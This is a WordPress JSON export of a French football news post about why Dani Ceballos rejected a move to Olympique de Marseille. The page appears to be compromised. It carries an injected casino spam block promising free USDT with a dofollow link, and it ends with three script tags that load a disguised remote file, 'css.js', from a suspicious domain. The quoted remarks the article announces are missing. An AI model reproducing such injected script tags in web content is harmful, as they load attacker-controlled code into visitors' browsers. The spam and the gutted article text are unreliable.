{"id":3977,"date":"2025-11-20T03:53:52","date_gmt":"2025-11-20T03:53:52","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3977"},"modified":"2026-02-02T22:10:55","modified_gmt":"2026-02-02T22:10:55","slug":"mercato-om-carvajal-revele-pourquoi-dani-ceballos-a-dit-non-a-lom","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/mercato-om-carvajal-revele-pourquoi-dani-ceballos-a-dit-non-a-lom\/","title":{"rendered":"Mercato OM &#8211; Carvajal r\u00e9v\u00e8le pourquoi Dani Ceballos a dit non \u00e0 l\u2019OM !"},"content":{"rendered":"<h1>Mercato OM &#8211; Carvajal r\u00e9v\u00e8le pourquoi Dani Ceballos a dit non \u00e0 l\u2019OM !<\/h1>\n<p>En qu\u00eate d\u2019un rempla\u00e7ant d\u2019Adrien Rabiot, l\u2019OM avait jet\u00e9 son d\u00e9volu sur Ceballos. Pablo Longoria et Medhi Benatia avaient m\u00eame r\u00e9ussi \u00e0 convaincre le joueur de quitter Madrid, profitant de son faible temps de jeu. Mais alors que le transfert paraissait imminent, l\u2019affaire a capot\u00e9 \u00e0 la derni\u00e8re minute, provoquant une grande frustration c\u00f4t\u00e9 marseillais.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-belgium-fr.com\/\" target=\"_blank\" rel=\"dofollow\">casino belgium \ud83d\udcb0 Ne manquez pas les 400 USDT gratuits en rejoignant casino belgium aujourd\u2019hui !<\/a><\/strong> &#8211; casino belgium \ud83d\udcb0 Tentez votre chance d\u00e8s aujourd\u2019hui avec casino belgium ! 300\u202fUSDT gratuits et 1000\u202fUSDT en bonus crypto sur votre d\u00e9p\u00f4t.<\/p><\/blockquote>\n<h2>Le r\u00f4le cl\u00e9 de Xabi Alonso<\/h2>\n<p>Ce mardi, Dani Carvajal a livr\u00e9 les coulisses de ce retournement de situation sur les ondes de la <em>Cadena Cope<\/em>. Tr\u00e8s proche de Ceballos, le lat\u00e9ral espagnol a expliqu\u00e9 :<\/p>\n<p>Un discours qui a convaincu Ceballos de rester \u00e0 Madrid, alors que tout \u00e9tait boucl\u00e9 avec l\u2019OM. Carvajal enfonce le clou :<\/p>\n<p>L\u2019OM, qui croyait tenir son renfort, a donc vu l\u2019opportunit\u00e9 s\u2019envoler en toute fin de mercato. Les Marseillais pourraient toutefois recroiser sa route tr\u00e8s vite\u2026 d\u00e8s le 16 septembre, au Bernab\u00e9u, pour leur entr\u00e9e en Ligue des champions.<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mercato OM &#8211; Carvajal r\u00e9v\u00e8le pourquoi Dani Ceballos a dit non \u00e0 l\u2019OM ! En qu\u00eate d\u2019un rempla\u00e7ant d\u2019Adrien Rabiot, l\u2019OM avait jet\u00e9 son d\u00e9volu sur Ceballos. Pablo Longoria et&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3977","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3977","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3977"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3977\/revisions"}],"predecessor-version":[{"id":14878,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3977\/revisions\/14878"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3977"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3977"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3977"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}